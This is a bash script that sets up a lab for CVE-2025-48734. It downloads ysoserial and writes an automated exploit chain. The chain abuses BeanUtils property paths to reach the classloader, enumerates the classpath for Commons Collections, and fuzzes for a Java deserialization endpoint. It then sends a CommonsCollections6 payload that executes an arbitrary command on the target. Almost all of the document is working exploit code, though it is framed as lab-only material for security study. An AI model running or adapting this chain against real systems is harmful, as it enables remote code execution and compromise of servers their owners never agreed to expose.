#!/usr/bin/env bash set -euo pipefail # ============================================ # CVE-2025-48734 Lab - Kali Attack Tools # Use ONLY in an isolated lab environment # ============================================ TARGET="${1:-10.211.55.10}" PORT="${2:-8080}" BASE_URL="http://$TARGET:$PORT" TOOLS_DIR="$HOME/lab-tools" YSOSERIAL_URL="https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar" pretty() { python3 -m json.tool 2>/dev/null || cat; } mkdir -p "$TOOLS_DIR" cd "$TOOLS_DIR" # ---------- Dependencies ---------- echo "[*] Checking dependencies..." apt-get update -q apt-get install -y --no-install-recommends curl python3 default-jdk # ---------- Download ysoserial ---------- if [ ! -f ysoserial-all.jar ]; then echo "[*] Downloading ysoserial..." curl -sL "$YSOSERIAL_URL" -o ysoserial-all.jar else echo "[*] ysoserial already downloaded" fi # ---------- Chained attack script ---------- cat > exploit.sh << 'EXPLOITEOF' #!/usr/bin/env bash TARGET="${1:-10.211.55.10}" PORT="${2:-8080}" BASE_URL="http://$TARGET:$PORT" TOOLS_DIR="$(dirname "$0")" pretty() { python3 -m json.tool 2>/dev/null || cat; } echo "" echo "=============================================" echo " PHASE 1 - Initial Reconnaissance" echo "=============================================" echo "[*] Probing simple bean properties..." curl -s "$BASE_URL/api/property?path=id" | pretty echo "" curl -s "$BASE_URL/api/property?path=status" | pretty echo "" echo "[*] Attempting access to declaringClass (CVE-2025-48734)..." RESULT=$(curl -s "$BASE_URL/api/property?path=status.declaringClass") echo "$RESULT" | pretty echo "" STATUS=$(echo "$RESULT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('status',''))" 2>/dev/null) if [ "$STATUS" != "success" ]; then echo "[-] declaringClass blocked - application is PATCHED. Aborting." exit 1 fi echo "[+] CVE-2025-48734 CONFIRMED - declaringClass accessible" echo "" echo "[*] Escalating to ClassLoader..." CL_RESULT=$(curl -s "$BASE_URL/api/property?path=status.declaringClass.classLoader") echo "$CL_RESULT" | pretty echo "" CL_TYPE=$(echo "$CL_RESULT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('valueClass',''))" 2>/dev/null) echo "[+] ClassLoader obtained: $CL_TYPE" echo "" echo "=============================================" echo " PHASE 2 - Classpath Enumeration via CVE" echo "=============================================" echo "[*] Iterating ClassLoader URLs via BeanUtils index notation..." CC="NOT FOUND" IDX=0 CLASSPATH_ENTRIES=() while true; do ENTRY=$(curl -s "$BASE_URL/api/property?path=status.declaringClass.classLoader.URLs%5B${IDX}%5D") ESTATUS=$(echo "$ENTRY" | python3 -c "import sys,json; print(json.load(sys.stdin).get('status',''))" 2>/dev/null) if [ "$ESTATUS" != "success" ]; then break fi VAL=$(echo "$ENTRY" | python3 -c "import sys,json; print(json.load(sys.stdin).get('value',''))" 2>/dev/null) CLASSPATH_ENTRIES+=("$VAL") echo " [$IDX] $VAL" if echo "$VAL" | grep -q "commons-collections-3"; then CC="FOUND" fi IDX=$((IDX + 1)) done echo "" if [ "$CC" = "NOT FOUND" ]; then echo "[-] Commons Collections 3.x not found in classpath." echo "[-] No gadget chain available. Aborting." exit 1 fi echo "[+] Commons Collections 3.x found - gadget chain available" echo "" echo "=============================================" echo " PHASE 3 - Deserialization Endpoint Discovery" echo "=============================================" echo "[*] Fuzzing common import/sync endpoints..." DESER_ENDPOINT="" for path in "/api/data/import" "/api/import" "/api/sync" "/api/upload" "/api/data/sync"; do CODE=$(curl -s -o /dev/null -w "%{http_code}" \ -X POST "$BASE_URL$path" \ -H "Content-Type: application/octet-stream" \ --data-binary $'\xac\xed\x00\x05') echo " POST $path → HTTP $CODE" if [ "$CODE" = "200" ] || [ "$CODE" = "400" ]; then # Verify ObjectInputStream by checking for EOFException signature RESP=$(curl -s -X POST "$BASE_URL$path" \ -H "Content-Type: application/octet-stream" \ --data-binary $'\xac\xed\x00\x05') if echo "$RESP" | grep -q "EOFException\|success\|error"; then DESER_ENDPOINT="$path" echo "[+] Deserialization endpoint found: $path" break fi fi done echo "" if [ -z "$DESER_ENDPOINT" ]; then echo "[-] No deserialization endpoint found. Aborting." exit 1 fi echo "=============================================" echo " PHASE 4 - Payload Generation and Delivery" echo "=============================================" if [ $# -lt 3 ]; then echo "[!] Usage: $0 " echo "[!] Example: $0 10.211.55.10 8080 'id'" exit 1 fi CMD="$3" PAYLOAD_FILE="$TOOLS_DIR/payload.ser" echo "[*] Generating ysoserial payload..." echo " Chain: CommonsCollections6" echo " Command: $CMD" echo "" java \ --add-opens java.base/java.util=ALL-UNNAMED \ --add-opens java.base/java.lang.reflect=ALL-UNNAMED \ --add-opens java.base/java.text=ALL-UNNAMED \ --add-opens java.desktop/java.awt.font=ALL-UNNAMED \ -jar "$TOOLS_DIR/ysoserial-all.jar" CommonsCollections6 "$CMD" > "$PAYLOAD_FILE" 2>/dev/null echo "[*] Payload generated: $PAYLOAD_FILE ($(wc -c < "$PAYLOAD_FILE") bytes)" echo "[*] Sending to endpoint $DESER_ENDPOINT..." echo "" curl -s -X POST "$BASE_URL$DESER_ENDPOINT" \ -H "Content-Type: application/octet-stream" \ --data-binary "@$PAYLOAD_FILE" | pretty echo "" echo "=============================================" echo " SUMMARY" echo "=============================================" echo " CVE-2025-48734: EXPLOITED" echo " Classpath via CVE: Commons Collections 3.x found" echo " Deser endpoint: $BASE_URL$DESER_ENDPOINT" echo " Payload: CommonsCollections6" echo " Command executed: $CMD" echo "=============================================" EXPLOITEOF chmod +x exploit.sh echo "" echo "=============================================" echo " Tools ready in: $TOOLS_DIR" echo "=============================================" echo " Usage:" echo " ./exploit.sh $TARGET $PORT 'id'" echo " ./exploit.sh $TARGET $PORT 'bash -c {id,}>/tmp/out.txt'" echo "============================================="